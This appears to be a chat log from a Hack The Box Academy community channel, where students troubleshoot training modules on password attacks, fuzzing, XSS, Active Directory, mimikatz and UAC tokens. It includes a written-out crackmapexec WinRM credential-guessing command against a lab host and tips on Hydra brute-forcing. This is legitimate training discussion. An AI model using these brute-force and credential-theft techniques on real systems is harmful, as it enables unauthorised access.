I just completed that updated section yesterday, I just followed what was in the section and got the answer
I'm following what's in the section, and I'm getting nothing. Hydra is just stuck there.
maybe restart the target, i think i followed it 1:1 (changing the ip/port of course)
I did that...twice.
did you do all the steps to create the wordlist correctly?
ok then you messed up somewhere on the wordlists or the command
those are really the only things it can be
I ran through the steps, twice. Exactly how it's demonstrated in the module, and I'm getting nothing. Hydra is just sitting there.
I just tried it with the exact steps and got it in less than 5 seconds
I did get some assistance, but if you have any tips, the password.list in the Resources didn't do anything. Do I have to make a custom password list using Will's password?
Ugh, WTF?!
does hydra show ~xxx tries per task?
and you did all the cupp stuff correctly? every answer?
it can't really be anything else beyond the wordlist or the command syntax if you can reach the target.
you should be able to get it following exactly what they do
I did the cupp thing all the way through with Jane and Jimbo, and Spot.
I'm running hydra in username-anarchy directory.
i just copied and pasted to finish the module 😭
yeah idk. maybe delete all your lists, cupp, username-anarchy, and redownload it all and start completely fresh
That's what I did too! 😭😭😭
Send me a DM
Got it
how do you restart a modules progress
🤦🏽♂️🤦🏽♂️🤦🏽♂️ of course it works after I get up to stretch, run to the RR, and grab me a bottle of water 😩😩😩
Anyone for a nudge on the Abusing HTTP Misconfiguration - Skills Assessment Hard?
I was able to generate a Cookie Grabber XSS payload that works (because I can make it work on myself) but it's not triggering so I don't know if I'm doing it in the wrong target or something.
It's not possible
3?
guys i need help i just put everything and its not working
Well at least I thought so, since you need to fuzz 3 parameters.
it says the connection was reset
are you supposed to use eternal blue?
And I'm trying to, to no avail.
yup
yes i think
what module
metasploit
hi
yo
i only used one
✨
So no separate wordlists for FUZZ, SUBDOMAIN, and PORT?
yeah, i thought u mean 3 at the same time
Well I DMed Ricky with an actual screenshot of commands attempted; waiting to hear back.
Having to resort to actually running nmap first before ffuf to figure out what other ports are open.
i don't understand u bro, can u explain ?
its eternal blue
is this modules section?
Hi folks, I was going through the Getting Started modules and in the Nibbles - Web Footprinting section it looks like Gobuster output is referencing a wordlist that no longer exists /usr/share/dirb/wordlists/common.txt
Use Locate common.txt and use the seclists one
Yup, I ended up using a different wordlist, might be worth updating the snippet with a recommended wordlist
Alright, time to further inquire about what it is I'm doing wrong here ― what can I do exactly to narrow down the hidden port that the hidden page is running on?
Yes.
You've been given a port, why would you fuzz it?
"One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" with a hint stating it should be running on a port different from the one provided
maybe read the hint better to understand what it's asking
in the answer, just replace the dynamic port given with the string PORT
Deleted the port list, removed it from the command line, and did just that, and... still nothing
Password Attacks
Network Services
been on this for 20 minutes, password is not being checked for winrm
This happens when the window is smaller than the expected for ffuf and it cannot line wrap correctly
$ crackmapexec winrm 10.129.206.199 -u username.list -p password.list
my command line that i ran
You can grep for a success, e.g., on [+]
Try and see
Well resizing the window didn't make a difference either. Still getting nothing but errors.
Keep digging, play with threads, fuzz for directories and etc
Increase recursion depth?
Increasing the threads can introduce false-negatives and skip directories that are present
Start one by one
Seems like still no password
search still continues, shouldn't take this long for an academy path
add --local-auth to the end
would this work for crackmapexec?
yes
don't think this will do anything, the machine is not domain joined anyways from the screenshot
oh, yeah, didnt see the screenshot
Hi all 🙂 Im starting the AD module, and i don't really understand why i can't find the 172.16.5.100 mentioned in the course. It never appears, not with wireshark, not with tcpdump and not with fping, not even with nmap. I've only got 3 alive machines , 5,225 & 130. Is it normal? Thanks 🙂
deleted the message because it contains answers, try using another shell or use remote tools
Which one?
oh sorry let me fix the screenshot
section? you won't get access to the 172 subnet, you'll need to pivot first

is this a problem with wmiexec not able to import modules? I dont really understand the reason
are you using wmiexec?
currently was using evil-winrm
but dont understand why I cant import powerview with it
it should work, try connecting again and importing, also make sure your own copy of powerview is good
Get-ExecutionPolicy to check setting
If it's restricted or something else, they show how to "bypass it"
might be my copy is wrong, because i did have this issue before, any source to download the correct one
make sure to download the raw file
Thanks, there was an issue with my version of powerview, used the one in the link, now it works
Good day, I am new to HtB Academy. I just finished a module that I would like to access offline. Is there a place I can access a PDF version of the completed module?
There isn't such a thing, but what you get is a lifetime access to the module and its future updates
Hey in what country is ceh most recognized?
Is the Starting Point Archetype box bugged? I got the flag but it's not submitting
Module: Windows Privilege Escalation
Section: Communication with Processes
Link to section: https://academy.hackthebox.com/module/67/section/926
At the end of the section it states:
From here, we could leverage these lax permissions to escalate privileges on the host to SYSTEM.
I assume the method of doing this will be discussed later in the module?
named pipes are whole another thing, you can read more about it if you want but don't need to know it for the course
Oh, okay. I just wanted to check whether this attack/privesc vector was part of the course. I'll definitely check it out sometime once I'm done with CPTS though 😂
Thanks
it's not exactly a vector, more like a communication method like COM and RPC
Btw @next bronze do you know anything about this? #modules message
I thought someone had already answered that
Someone did refer me to a video. I just wanted another person's response too 😅
fair enough
run as admin doesn't necessarily mean you have to be an admin, it really does UAC token elevation, some permissions can be assigned to users even if they're not in an admin group, but depending on how the integrity level is configured, it will not be available to the default token, so when you run as admin, that process is run with the elevated token and you'll see more permissions
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/how-it-works
https://learn.microsoft.com/en-us/windows-server/security/user-account-control/how-user-account-control-works
Hi everyone,
In Abusing HTTP Misconfigurations Skill Assessment - Hard, I got XSS on the sort_by param, and I tried many unkeyed-parameter techniques including "parameter cloaking" and "fat GET". Could anyone help me on this please?
Does this mean a user has more than one access token? A regular token and an elevated token?
By "need to elevate" you mean to run an administrative PowerShell console?
well it also depends on the user, if you're a standard domain user and used another user's creds for UAC elevation, you're using their token and security context, not your own
it's that pop up window that ask if you want to make changes to your device
On the Windows Attacks & Defense module,
https://academy.hackthebox.com/module/176/section/1780
it's discussing a GPP cached cred attack and suggests flagging the policy XML file as a honey pot. I've noticed this file appears to exist within a GUID/SID/SPN(?) (not sure which) and im curious whether this is a file per user, or if this is a ... well how to identify what it is exactly within the context of the extra directories seen in sysvol... chat gpt thinks they're GUIDs, I suppose I could use a ps cmdlet to identify what it is once i know it, is that kinda all there is to it? identify whether it's a GUID/SID and then identify it using the cmdlet?
Ouhh, I see. So if I'm logged in as htb-student but use the creds of htb-student_adm for the UAC elevation, then the PowerShell console runs in the security context of htb-student_adm? So the whoami command will also return htb-student_adm?
yep, you get a shell as the user you entered the creds for. that part is pretty much just logging in
pretty much im just looking to identify the policy names from their (GUIDs?) but unsure the best way to go about that
From the resource you shared:
When a user signs in, the system creates an access token for that user. The access token contains information about the level of access that the user is granted, including specific security identifiers (SIDs) and Windows privileges.
When an administrator logs on, two separate access tokens are created for the user: a standard user access token and an administrator access token.
So not all users have two access tokens? Only administrators? I'm confused now.
no reason to have two if you don't have special permissions that require elevation
Oh, so by default standard users don't, but it can be created?
if it's required, yeah
Alrighty, thanks a lot for the explanation!
Hi guys, im getting stuck on start finalrecon enumeration
Traceback (most recent call last):
File "/home/user/FinalRecon/./finalrecon.py", line 186, in <module>
parsed_url = extractor.extract_urllib(split_url)
^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'TLDExtract' object has no attribute 'extract_urllib'
guys i'm doing the AD skill assessment II and i got access to the MS01 host, i'm trying to use mimikatz but i can't, it keeps spamming "mimikatz #" in the terminal, i'm using evil-winrm to connect
i tried to use wmiexec but i get this error [-] rpc_s_access_denied
Mimikatz's interactive prompt is flaky in evil-winrm, substitute the commands you wanna run in " " and end with exit